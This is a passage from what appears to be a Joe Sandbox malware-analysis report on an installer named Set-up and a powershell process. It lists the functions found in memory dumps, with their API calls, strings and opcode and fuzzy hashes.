                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                    Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3509786178-2769509956
                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                    Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                    Executed Functions

                                                                    Function 00CA3FA0 Relevance: .3, Instructions: 292COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2126770385.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_ca0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6432a537f348e1526c5d951fa81e97d396244435f7c34041b3864d0c8fd9343e
                                                                    • Instruction ID: 52ecf9c05dc63ce6097be67e62bf8b784de5dfdbb286892e96679e5766c3050b
                                                                    • Opcode Fuzzy Hash: 6432a537f348e1526c5d951fa81e97d396244435f7c34041b3864d0c8fd9343e
                                                                    • Instruction Fuzzy Hash: E0C19E74A002068FCB09CF99C494AAEFBB1FF89314B248659E515AB365C735FC91CFA0
                                                                    Function 073B15CD Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2129408155.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_73b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b30500fb13fa6a67163035986c4227ebceea2a4ceb47b536bf99815e36c3d31c
                                                                    • Instruction ID: 84515768aa1e8fe1c5e2fb376edc942bf8fac1b4b4db70664ac0456558ae2830
                                                                    • Opcode Fuzzy Hash: b30500fb13fa6a67163035986c4227ebceea2a4ceb47b536bf99815e36c3d31c
                                                                    • Instruction Fuzzy Hash: 54418DF1B001189BDB35977C8421AEEBFA2AFC5364B1884BADA059FB51CE31C845C7A1
                                                                    Function 00CA4198 Relevance: .1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2126770385.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_ca0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04af409e0de8a4bdafb1520032d6ef2db36b689b5b86d9ea51fa19baaef937ae
                                                                    • Instruction ID: 532626eb9ca433b41d1ad8d2a17b77eccd3303327bf2d4720d118bf9734d2416
                                                                    • Opcode Fuzzy Hash: 04af409e0de8a4bdafb1520032d6ef2db36b689b5b86d9ea51fa19baaef937ae
                                                                    • Instruction Fuzzy Hash: 604127B4A005068FCB09CF89C199EAAFBB1FF88314B11825AD515AB364C732FD51CFA4
                                                                    Function 00CA419F Relevance: .1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2126770385.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_ca0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47c3ecffe507519f183c487063bffd452ecc22266df42cff78be64297d946ce2
                                                                    • Instruction ID: cc3f774b16378af89690ea4b79bcbe7e99de6f0b6ea41acb17ea1617fe47ba84
                                                                    • Opcode Fuzzy Hash: 47c3ecffe507519f183c487063bffd452ecc22266df42cff78be64297d946ce2
                                                                    • Instruction Fuzzy Hash: 824128B4A005068FCB09CF99C599EAAFBB1FF88314B11826AD515AB364C732FD51CF94
                                                                    Function 00CA3010 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2126770385.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_ca0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c64391839135408ac58d1135ae41bfbb959aad376db3d752e5ccafe6eb7122de
                                                                    • Instruction ID: 937951b86009b26befe76f25665f83857001929182c1a52faf1b4f630ff00e28
                                                                    • Opcode Fuzzy Hash: c64391839135408ac58d1135ae41bfbb959aad376db3d752e5ccafe6eb7122de
                                                                    • Instruction Fuzzy Hash: 2F215EB4A042598FCB04CF9DC4909AABBB1FF49300B158496E415EB356C735ED41CBA1
                                                                    Function 00CA3001 Relevance: .1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2126770385.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_ca0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7cb05b1a0745382ed918afce8bd814ce048b6704c4691e74427b104831f2a6f8
                                                                    • Instruction ID: 6a4e1d15357a582213cbff5ba1953e7c9d93bf77d68329ae16435f446cb7ee0c
                                                                    • Opcode Fuzzy Hash: 7cb05b1a0745382ed918afce8bd814ce048b6704c4691e74427b104831f2a6f8
                                                                    • Instruction Fuzzy Hash: A3214F75A042498FCB00CF58D5909AEFBB5FF4A314F158195E819EB352C335EE41CBA1
                                                                    Function 00A7D01D Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2126380812.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_a7d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8ad3b1df87b90814ecd29de0ad19b6d8ad570fb707865d8df8c9738c6f755ad5
                                                                    • Instruction ID: c885196c82a60cbcda5f4eb77e1b4b13008228af080237b2a254a439005e64f5
                                                                    • Opcode Fuzzy Hash: 8ad3b1df87b90814ecd29de0ad19b6d8ad570fb707865d8df8c9738c6f755ad5
                                                                    • Instruction Fuzzy Hash: 020126311083009AE7108B29CD84B67BFB8EF41324F1CC42AEC0E0B246C279DC46C6B1
                                                                    Function 00A7D01C Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2126380812.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_a7d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 33bb0016f27b1648c306a54c26ee112d6eea5d974c097ba5f8079f56cbd65792
                                                                    • Instruction ID: 0f1972f3f459c16c2ae94e69365ffbcd2ff3422464c124e58e21dcee311374be
                                                                    • Opcode Fuzzy Hash: 33bb0016f27b1648c306a54c26ee112d6eea5d974c097ba5f8079f56cbd65792
                                                                    • Instruction Fuzzy Hash: A2F0C271004340AEE7108B1ACC84B62FFA8EF51734F18C45AED4D1E286C2799C45CAB1

                                                                    Non-executed Functions

                                                                    Function 073B2C10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2129408155.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_73b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                    • API String ID: 0-2125118731
                                                                    • Opcode ID: 3752258e6fa79ed00441cd4fd4dfe20fdea6e662f2f91c23f61aaf0caaa5bf4e
                                                                    • Instruction ID: 0cfe89c797372e365712306b6904f1384711b616a4351a487d71f52210362b94
                                                                    • Opcode Fuzzy Hash: 3752258e6fa79ed00441cd4fd4dfe20fdea6e662f2f91c23f61aaf0caaa5bf4e
                                                                    • Instruction Fuzzy Hash: 012149F171020A5BEB3855698C00B67B69A7BC4715F24863AAA8DCFB95CD39C845C361